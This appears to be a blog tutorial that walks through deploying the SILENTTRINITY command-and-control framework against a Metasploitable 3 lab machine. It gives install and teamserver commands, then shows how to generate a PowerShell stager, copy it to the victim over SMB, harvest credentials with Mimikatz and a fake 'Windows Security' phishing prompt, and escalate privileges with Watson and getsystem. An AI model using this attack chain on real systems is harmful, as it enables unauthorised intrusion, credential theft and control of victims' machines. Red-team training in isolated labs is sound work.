If you want to use a new command and control framework that isn’t Empire or Cobalt Strike, there are options. That is why I am showing how to use SILENTTRINITY which comes to us from github.com/byt3bl33d3r.
Silenttrinity allows the user to install persistence, escalation privileges, pop random messageboxes, make the victim’s mouse move ( I haven’t tested this one yet have you? ) run commands, and more while utilizing encrypted command and control server connections.
The listener/stager/module architecture is very similar to Empire’s so this walkthrough will maybe ring a few bells.
There are many tutorials ( there are some ) on using SILENTTRINTY, but they are missing some pretty critical details I find. That’s my soapbox – I tried to cover all the essentials for this tutorial.
Want to learn Linux privilege escalation for real? Give Escalate_Linux a shot using my walkthrough of course.
Table of Contents
Here’s What You Need
- Windows VM – I am using Metasploitable 3 VM
- Kali Linux VM
- SILENTTRINITY from GitHub
What is SILENTTRINITY?
SILENTTRINITY is modern, asynchronous, multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. It’s the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET API’s, a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.
https://github.com/byt3bl33d3r/SILENTTRINITY
“Explain it to me like I’m 5”
Well Microsoft caught on to the fact that malicious use of PowerShell was going down so they now ( and other vendors for security tools ) have built in signatures for such attacks.
So now that PowerShell is too hot there is a movement to utilize C# as it also has access to the same .NET APIs that PowerShell does. This is all blended together with another movement to LOL ( live off the land ). Why should you have to download exploit tools when they are already installed in Windows?
“How is SILENTTRINITY any different?”
ST admittedly is the result of “research into embedded third-party .NET scripting languages to dynamically call .NET API’s”. The idea is that .NET compatible languages are now being used to carry out attacks in Windows.
Boo is an object-oriented, statically typed, general-purpose programming language that seeks to make use of the Common Language Infrastructure’s support for Unicode, internationalization, and web applications, while using a Python-inspired syntax and a special focus on language and compiler extensibility
wikipedia
The post exploitation modules are written in Boo. IronPython, a .NET implementation of Python, that is used to target the .NET framework, is used in ST as well.
Installation
I have found the best steps to take for installation are found in the article by hunter2.gitbook.io, however I made some modifications to the steps as the most current version architecture did not match a few of his listed commands.
#Grab the dependencies
cd /opt
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install
#Setup SILENTTRINITY
apt install python3 python3-pip
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
cd SILENTTRINITY
python3 -m pip install -r requirements.txt
#Launch
python3 st.py
Start the Teamserver
The first step is to start the team server and without doing so if you run ST it will give a “disconnected” message and commands won’t work.
root@kali:/opt/impacket/SILENTTRINITY# python3 teamserver.py --port 1234 192.168.56.101 skippy123
The syntax for this command is python3 teamserver.py {port to listen on} {host IP address} {teamserver password}
UPDATE: 1-2020
Start the teamserver this way since it is gone now.
python3 st.py teamserver --port 1234 10.0.0.250 user skippy123
Then connect to the teamserver.
root@kali:/opt/impacket/SILENTTRINITY# python3 st.py client
>> teamservers
connect wss://username:[email protected]:1234
Start SILENTTRINITY
Remember the team server we started? We will connect to it in order to start ST. This is a step that few other tutorials and sites even mention for some reason.
root@kali:/opt/impacket/SILENTTRINITY# python3 st.py client wss://username:[email protected]:1234
A successful connection will look like this below.
[INFO] – connection.py: connect – Connected to wss://192.168.56.101:1234
Start a Listener
A listener is required and the listener/stager/module architecture is very similar to Empire’s. To do so type use + tab to see there are two options: http and https.
Choose a Stager
Picking a stager depends on the task to be accomplished. For simple setup I am using PowerShell, because I know it will output a .ps1 script for me to run on the victim machine.
Move the File to Victim
With the payload generated it is now time to move the file to the Windows machine. For this task I use Impacket’s smbserver script.
root@kali:/opt/impacket/SILENTTRINITY# smbserver.py kali /tmp
Then use the copy command to get the file from the SMB server.
copy stager.ps1 //192.168.56.101/opt
Execute the Payload
I run the payload or stager with PowerShell for the purposes of this tutorial.
And Mimikatz grabs the account credentials it can.
Post Exploitation
After running the payload our listener gets a session back to it. From there we can now run post-exploitation steps to escalate privileges and/or terrorize the victim user. The author has a great sense of humor.
Select a Module
There are many modules to choose from. Take a look at msgbox.
A creepy message box appears on the Windows machine.
Or take a look at CredPhisher which is one of my favorites.
On the Windows machine it pops up a new prompt, it looks like “Windows Security” needs the user’s credentials ASAP for some reason!
The credentials are then sent to the C2 server for us to see.
Privilege Escalation
We are going to go through more enumeration, this is referred to as post-exploit local enumeration.
boo/execute-assembly │ Execute a .NET assembly in memory
We are going to use Watson.
Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities.
https://github.com/rasta-mouse/Watson
modules
use execute-assembly
set Assembly /opt/Watson.exe
run {session UID}
Or using the getsystem technique which in this case works against Metasploitable 3.
Summary of Using SILENTTRINITY
This is a basic overview of the steps of using ST.
- python3 teamserver.py –port 1234 192.168.56.101 skippy123
- python3 st.py wss://username:[email protected]:4444
- listeners
- use http -or- https
- start
- stagers
- use PowerShell/dll/wmic/csharp/exe/msbuild
- generate http -or- https
- Run payload on victim
- Sessions
- Modules
- Use boo/{module}
- Run {session name}
FAQ
Q. I am using post exploit modules by using the modules command, but nothing is happening?
A. Did you start a listener? Remember to start a listener with the start command.